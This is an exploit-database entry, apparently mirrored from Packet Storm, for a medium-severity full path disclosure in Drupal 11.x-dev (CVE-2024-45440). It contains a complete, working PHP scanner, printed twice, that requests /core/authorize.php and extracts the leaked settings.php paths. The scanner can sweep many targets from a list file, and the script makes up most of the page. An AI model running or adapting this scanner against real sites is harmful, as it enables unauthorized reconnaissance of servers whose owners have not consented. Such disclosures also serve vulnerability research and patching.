📄 Drupal 11.x-dev Information Disclosure_PACKETSTORM:212771

5.3 / 10

MEDIUM

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Description

Proof of concept script demonstrating a full path disclosure issue in Drupal version 11.x-dev...

Visit Original Source

Basic Information

ID PACKETSTORM:212771

Published Dec 12, 2025 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : Drupal 11.x-dev full Information Disclosure |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.drupal.org/project/drupal/releases/11.x-dev |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/190573/ & CVE-2024-45440

[+] Summary :
The vulnerability exists due to improper error handling in authorize.php when the hash_salt configuration
attempts to read a non-existent file using file_get_contents(). This reveals the full server path even when error logging is disabled.

[+] POC :

php poc.php or http://127.0.0.1/poc.php

<?php
/*
* Drupal 11.x-dev Full Path Disclosure
* CVE-2024-45440
* PHP Implementation
*/

class DrupalPathDisclosure {
private $timeout = 10;
private $user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0';

public function scan_single($url) {
echo "[*] Scanning: $url\n";

if (!str_starts_with($url, 'http')) {
$url = 'http://' . $url;
}

$full_url = $url . '/core/authorize.php';

try {
$ch = curl_init();
curl_setopt_array($ch, [
CURLOPT_URL => $full_url,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_TIMEOUT => $this->timeout,
CURLOPT_USERAGENT => $this->user_agent,
CURLOPT_FOLLOWLOCATION => false,
CURLOPT_SSL_VERIFYPEER => false
]);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code == 200 && strpos($response, 'settings.php') !== false) {
preg_match_all('/<em class="placeholder">(\/.*?settings\.php)/', $response, $matches);

if (!empty($matches[1])) {
echo "[+] Vulnerable - Paths disclosed:\n";
foreach ($matches[1] as $path) {
echo " $path\n";
}
return true;
}
}

echo "[-] Not vulnerable\n";
return false;

} catch (Exception $e) {
echo "[-] Error: " . $e->getMessage() . "\n";
return false;
}
}

public function scan_multiple($file_path) {
if (!file_exists($file_path)) {
echo "[-] File not found: $file_path\n";
return;
}

$urls = file($file_path, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
$vulnerable = [];

echo "[*] Scanning " . count($urls) . " targets...\n";

foreach ($urls as $url) {
if ($this->scan_single($url)) {
$vulnerable[] = $url;
}
echo "\n";
}

if (!empty($vulnerable)) {
echo "[+] Summary - Vulnerable hosts:\n";
foreach ($vulnerable as $host) {
echo " $host\n";
}
} else {
echo "[-] No vulnerable hosts found\n";
}
}
}

// CLI Interface
if (php_sapi_name() === 'cli') {
$scanner = new DrupalPathDisclosure();

if ($argc < 2) {
echo "Usage:\n";
echo " php drupal_path.php <url> - Scan single target\n";
echo " php drupal_path.php -f <file> - Scan multiple targets from file\n";
echo "\nExamples:\n";
echo " php drupal_path.php example.com\n";
echo " php drupal_path.php -f targets.txt\n";
exit(1);
}

if ($argv[1] === '-f' && isset($argv[2])) {
$scanner->scan_multiple($argv[2]);
} else {
$scanner->scan_single($argv[1]);
}
}
?>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

{
    "lastseen": "2025-12-12T17:15:18",
    "description": "Proof of concept script demonstrating a full path disclosure issue in Drupal version 11.x-dev...",
    "published": "2025-12-12T00:00:00",
    "modified": "2025-12-12T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Drupal 11.x-dev Information Disclosure",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:212771",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2024-45440"
    ],
    "sourceData": "=============================================================================================================================================\n    | # Title     : Drupal 11.x-dev full Information Disclosure                                                                                 |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |\n    | # Vendor    : https://www.drupal.org/project/drupal/releases/11.x-dev                                                                     |\n    =============================================================================================================================================\n    \n    [+] References :  https://packetstorm.news/files/id/190573/ &  CVE-2024-45440\n    \n    [+] Summary : \n                 The vulnerability exists due to improper error handling in authorize.php when the hash_salt configuration \n    \t\t\t attempts to read a non-existent file using file_get_contents(). This reveals the full server path even when error logging is disabled.\n    \t\t\t \n    [+]  POC : \n    \n    php poc.php  or http://127.0.0.1/poc.php \n    \n    <?php\n    /*\n     * Drupal 11.x-dev Full Path Disclosure\n     * CVE-2024-45440\n     * PHP Implementation\n     */\n    \n    class DrupalPathDisclosure {\n        private $timeout = 10;\n        private $user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0';\n        \n        public function scan_single($url) {\n            echo \"[*] Scanning: $url\\n\";\n            \n            if (!str_starts_with($url, 'http')) {\n                $url = 'http://' . $url;\n            }\n            \n            $full_url = $url . '/core/authorize.php';\n            \n            try {\n                $ch = curl_init();\n                curl_setopt_array($ch, [\n                    CURLOPT_URL => $full_url,\n                    CURLOPT_RETURNTRANSFER => true,\n                    CURLOPT_TIMEOUT => $this->timeout,\n                    CURLOPT_USERAGENT => $this->user_agent,\n                    CURLOPT_FOLLOWLOCATION => false,\n                    CURLOPT_SSL_VERIFYPEER => false\n                ]);\n                \n                $response = curl_exec($ch);\n                $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);\n                curl_close($ch);\n                \n                if ($http_code == 200 && strpos($response, 'settings.php') !== false) {\n                    preg_match_all('/<em class=\"placeholder\">(\\/.*?settings\\.php)/', $response, $matches);\n                    \n                    if (!empty($matches[1])) {\n                        echo \"[+] Vulnerable - Paths disclosed:\\n\";\n                        foreach ($matches[1] as $path) {\n                            echo \"    $path\\n\";\n                        }\n                        return true;\n                    }\n                }\n                \n                echo \"[-] Not vulnerable\\n\";\n                return false;\n                \n            } catch (Exception $e) {\n                echo \"[-] Error: \" . $e->getMessage() . \"\\n\";\n                return false;\n            }\n        }\n        \n        public function scan_multiple($file_path) {\n            if (!file_exists($file_path)) {\n                echo \"[-] File not found: $file_path\\n\";\n                return;\n            }\n            \n            $urls = file($file_path, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);\n            $vulnerable = [];\n            \n            echo \"[*] Scanning \" . count($urls) . \" targets...\\n\";\n            \n            foreach ($urls as $url) {\n                if ($this->scan_single($url)) {\n                    $vulnerable[] = $url;\n                }\n                echo \"\\n\";\n            }\n            \n            if (!empty($vulnerable)) {\n                echo \"[+] Summary - Vulnerable hosts:\\n\";\n                foreach ($vulnerable as $host) {\n                    echo \"    $host\\n\";\n                }\n            } else {\n                echo \"[-] No vulnerable hosts found\\n\";\n            }\n        }\n    }\n    \n    // CLI Interface\n    if (php_sapi_name() === 'cli') {\n        $scanner = new DrupalPathDisclosure();\n        \n        if ($argc < 2) {\n            echo \"Usage:\\n\";\n            echo \"  php drupal_path.php <url>          - Scan single target\\n\";\n            echo \"  php drupal_path.php -f <file>      - Scan multiple targets from file\\n\";\n            echo \"\\nExamples:\\n\";\n            echo \"  php drupal_path.php example.com\\n\";\n            echo \"  php drupal_path.php -f targets.txt\\n\";\n            exit(1);\n        }\n        \n        if ($argv[1] === '-f' && isset($argv[2])) {\n            $scanner->scan_multiple($argv[2]);\n        } else {\n            $scanner->scan_single($argv[1]);\n        }\n    }\n    ?>\n    \n    Greetings to :=====================================================================================\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\n    ===================================================================================================",
    "sourceHref": "https://packetstorm.news/download/212771",
    "cvss": {
        "score": 5.3,
        "severity": "MEDIUM",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/212771/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply